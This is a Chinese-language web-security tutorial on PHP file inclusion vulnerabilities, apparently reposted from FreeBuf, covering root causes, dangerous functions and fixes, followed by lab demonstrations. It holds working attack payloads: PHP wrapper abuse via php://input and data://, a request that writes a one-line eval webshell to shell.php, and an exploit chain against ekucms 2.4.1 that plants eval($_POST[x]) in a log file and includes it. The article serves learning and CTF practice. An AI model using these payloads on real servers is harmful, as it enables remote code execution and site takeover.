Web安全-文件包含

admin 2023年1月17日13:39:21安全文章Web安全-文件包含已关闭评论12 views5991字阅读19分58秒阅读模式

1、思维导图

图片

2、文件包含原理

文件包含一般是指源文件可以将另一个文件的全部内容包含进来。

其一般形式:#include "文件名" 或者 #include<文件名>

3、文件包含的条件

  • 用户能够控制这个动态变量

  • include()等函数通过动态变量的方式引入需要包含的文件

4、文件包含漏洞的危害

  • 敏感信息泄露

  • 获取webshell

  • 任意命令执行

5、文件包含漏洞修复

  • 设置白名单

  • 过滤危险字符

  • 设置文件目录

  • 关闭危险配置

6、涉及包含的危险函数

PHP:include(),include_once(),require(),require_once(),fopen(),readfile()
JSP/Servlet:ava.io.file(),java.io.filereader()
ASP:include file,include virtual

include():包含并运行指定的文件,包含文件发生错误时,程序警告,但会继续执行。

require():包含并运行指定的文件,包含文件发生错误时,程序直接终止执行。

include_once():和 include 类似,不同处在于 include_once 会检查这个文件是否已经被导入,如果已导入,下文便不会再导入,直面 once 理解就是只导入一次。

require_once():和 require 类似,不同处在于 require_once 只导入一次。

php.ini配置文件:allow_url_fopen=off即不可以包含远程文件,php4存在远程包含和本地包含,php5仅存在本地包含。

使用上面几个函数包含文件时,该文件作为PHP代码执行,PHP内核并不在意被包含的文件是什么类型,也就是说我们这几个函数包含.jpg文件时,也会将其当作php文件来执行。

7、案例演示-本地包含

7.1、无限制文件包含

include.php

<?php
$filename=$_GET['filename'];
include ( $filename);
//http://127.0.0.1:8080/include.php?filename=index.txt
?>

index.txt

<?php
phpinfo();
?>

图片

7.2、有限制文件包含

include.php

<?php

$filename=$_GET['filename'];
include ( $filename ." .html" );

?>

index.txt

<?php
phpinfo();
?>

图片
%00绕过

图片
垃圾数据绕过

图片

8、案例演示-远程包含

8.1、条件

如果php.ini的配置选项allow_url_fopen,allow_url_include都为ON的话,文件包含函数是可以加载远程文件的,这种漏洞就被称为远程文件包含。利用这个漏洞,可以直接执行任意命令。

allow_url_fopen 是否允许打开URL文件

allow_url_include 是否允许引用URL文件

图片

8.2、文件包含的各种写法

include $_GET[]
include $_GET[].”.inc”
include “./“.$_GET[]
include “./include”.$_GET[]
include “./include”.$_GET[].”.inc”

在远程服务器上创建readme.txt并访问

<?php
phpinfo();
?>

图片
访问:http://127.0.0.1/include.php/?filename=http://192.168.192.131/index.txt

图片

8.3、协议玩法

大佬总结:https://www.cnblogs.com/endust/p/11804767.html

PHP支持的伪协议

file:// — 访问本地文件系统
http:// — 访问 HTTP(s) 网址
ftp:// — 访问 FTP(s) URLs
php:// — 访问各个输入/输出流(I/O streams)
zlib:// — 压缩流
data:// — 数据(RFC 2397)
glob:// — 查找匹配的文件路径模式
phar:// — PHP 归档
ssh2:// — Secure Shell 2
rar:// — RAR
ogg:// — 音频流
expect:// — 处理交互式的流

8.3.1、php.ini参数设置

在php.ini里有两个重要的参数allow_url_fopen、allow_url_include。

allow_url_fopen:默认值是ON。允许url里的封装协议访问文件。

allow_url_include:默认值是OFF。不允许包含url里的封装协议包含文件。

8.3.2、各个协议的利用条件和方法

图片

8.3.3、php://input

php://input可以访问请求的原始数据的只读流,将post请求的数据当作php代码执行。当传入的参数作为文件名打开时,可以将参数设为php://input,同时post想设置的文件内容,php执行时会将post内容当作文件内容。

注:当enctype=”multipart/form-data”时,php://input是无效的。

8.3.4、file://

用于访问本地文件系统。当指定了一个相对路径(不以/、、\或 Windows 盘符开头的路径)提供的路径将基于当前的工作目录。

用法:

1、file://[文件的绝对路径和文件名]
http://127.0.0.1/include.php?file=file://D:\phpStudy\WWW\index.txt
2、[文件的相对路径和文件名]
http://127.0.0.1/include.php?file=./index.txt

8.3.5、http:// https://

URL 形式,允许通过 HTTP 1.0 的 GET方法,以只读访问文件或资源,通常用于远程包含。

用法:

[http://网络路径和文件名]http://127.0.0.1/include.php?file=http://127.0.0.1/index.txt

8.3.6、php://

php:// 用于访问各个输入/输出流(I/O streams),经常使用的是php://filter和php://input,php://filter用于读取源码,php://input用于执行php代码。

协议 作用
php://input 可以访问请求的原始数据的只读流,在POST请求中访问POST的data部分,在enctype="multipart/form-data" 的时候php://input 是无效的。
php://output 只写的数据流,允许以 print 和 echo 一样的方式写入到输出缓冲区。
php://fd (>=5.3.6)允许直接访问指定的文件描述符。例如 php://fd/3 引用了文件描述符 3。
php://memory php://temp (>=5.1.0)一个类似文件包装器的数据流,允许读写临时数据。两者的唯一区别是 php://memory 总是把数据储存在内存中,而 php://temp 会在内存量达到预定义的限制后(默认是 2MB)存入临时文件中。临时文件位置的决定和 sys_get_temp_dir() 的方式一致。
php://filter (>=5.0.0)一种元封装器,设计用于数据流打开时的筛选过滤应用。对于一体式(all-in-one)的文件函数非常有用,类似 readfile()、file() 和 file_get_contents(),在数据流内容读取之前没有机会应用其他过滤器。

8.3.7、php://filter参数详解

参数 描述
resource=<要过滤的数据流> 必须项。它指定了你要筛选过滤的数据流。
read=<读链的过滤器> 该参数可选。可以设定一个或多个过滤器名称,以管道符(|)分隔
write=<写链的筛选列表> 该参数可选。可以设定一个或多个过滤器名称,以管道符(|)分隔
<; 两个链的过滤器> 任何没有以 read=或 write=作前缀的筛选器列表会视情况应用于读或写链。

8.3.8、可用的过滤器列表(4类)

字符串过滤器 作用
string.rot13 等同于str_rot13(),rot13变换
string.toupper 等同于strtoupper(),转大写字母
string.tolower 等同于strtolower(),转小写字母
string.strip_tags 等同于strip_tags(),去除html、PHP语言标签
转换过滤器 作用
convert.base64-encode & convert.base64-decode 等同于base64_encode()和base64_decode(),base64编码解码
convert.quoted-printable-encode & convert.quoted-printable-decode quoted-printable 字符串与 8-bit 字符串编码解码
压缩过滤器 作用
zlib.deflate & zlib.inflate 在本地文件系统中创建 gzip 兼容文件的方法,但不产生命令行工具如 gzip的头和尾信息。只是压缩和解压数据流中的有效载荷部分。
bzip2.compress & bzip2.decompress 同上,在本地文件系统中创建 bz2 兼容文件的方法。
加密过滤器 作用
mcrypt.* libmcrypt 对称加密算法
mdecrypt.* libmcrypt 对称解密算法

8.3.9、读取文件源码的用法

php://filter/read=convert.base64-encode/resource=[文件名]

http://127.0.0.1/include.php?file=php://filter/read=convert.base64-encode/resource=phpinfo.php

8.3.10、执行php代码用法

php://input + [POST DATA]

http://127.0.0.1/include.php?file=php://input
[POST DATA部分]

<?php phpinfo(); ?>

8.3.11、写入一句话木马

http://127.0.0.1/include.php?file=php://input
[POST DATA部分]

<?php fputs(fopen('shell.php','w'),'<?php @eval($_GET[cmd]); ?>'); ?>

8.3.12、phar://、zip://、bzip2://、zlib://

用于读取压缩文件,zip:// 、 bzip2:// 、 zlib:// 均属于压缩流,可以访问压缩文件中的子文件,更重要的是不需要指定后缀名,可修改为任意后缀:jpg png gif xxx 等等。

phar://http://127.0.0.1/include.php?file=phar://E:/phpStudy/PHPTutorial/WWW/phpinfo.zip/phpinfo.txt

8.3.13、data://

数据流封装器,以传递相应格式的数据。通常可以用来执行PHP代码。

1、data://text/plain,
http://127.0.0.1/include.php?file=data://text/plain,<?php phpinfo();?>

2、data://text/plain;base64,
http://127.0.0.1/include.php?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8%2b

8.3.14、filter演示

http://127.0.0.1/include.php?filename=php://filter/read=convert.base64-encode/resource=index.txt

读取本地index.txt以base64进行加密

图片

解密后:

图片

8.3.15、input演示

应该是当enctype="multipart/form-data"时,php://input是无效的。

8.3.16、file演示

http://127.0.0.1/include.php?filename=file://D:\phpStudy\WWW\index.txt

图片

8.3.17、data演示

http://127.0.0.1/include.php?filename=data://text/plain,<?php phpinfo();?>

图片

http://127.0.0.1/include.php?filename=data://text/plain,<?php system(dir);?>

图片

9、CTF-南邮杯

CTF链接:http://4.chinalover.sinaapp.com/web7/index.php

1、利用伪协议http://4.chinalover.sinaapp.com/web7/index.php?file=php://filter/read=convert.base64-encode/resource=index.php

图片

2、利用bash64解密

图片

10、ekucms-文件包含

1、在URL中输入http://127.0.0.1/ekucms2.4.1/index.php?s=my/show/id/{~eval($_POST[x])}

图片

2、虽然出现错误,但是在后台可以看到,日志文件中已经写入了shell

图片

3、直接执行phpinfo

http://127.0.0.1/ekucms2.4.1/index.php?s=my/show/id/\..\temp\logs\22_04_20.log

图片

4、直接上菜刀

图片

本文作者:wangkun05, 转载请注明来自FreeBuf.COM

加微信进群领资料

图片

图片

回复“电子书”获取web渗透、CTF电子书:

回复“视频教程”获取渗透测试视频教程;  

回复“内网书籍”获取内网学习书籍;        

回复“CTF工具”获取渗透、CTF全套工具;

回复“内网渗透;获取内网渗透资料;

回复护网;获取护网学习资料 ;

回复python,获取python视频教程;

回复java,获取Java视频教程;

回复go,获取go视频教程


知识星球

图片



【Hacking藏经阁】知识星球致力于分享技术认知

1、技术方面。主攻渗透测试(web和内网)、CTF比赛、逆向、护网行动等;

400G渗透教学视频、80多本安全类电子书、50个渗透靶场(资料主要来自本人总结、以及学习过程中购买的课程)

2、认知方面。副业经营、人设IP打造,具体点公众号运营、抖*yin等自媒体运营(目前主要在运营两个平台4个号)。


如果你也想像我一样,不想35岁以后被动的去面试,那么加入星球我们一起成长。




特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年1月17日13:39:21
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  Web安全-文件包含 https://cn-sec.com/archives/1519985.html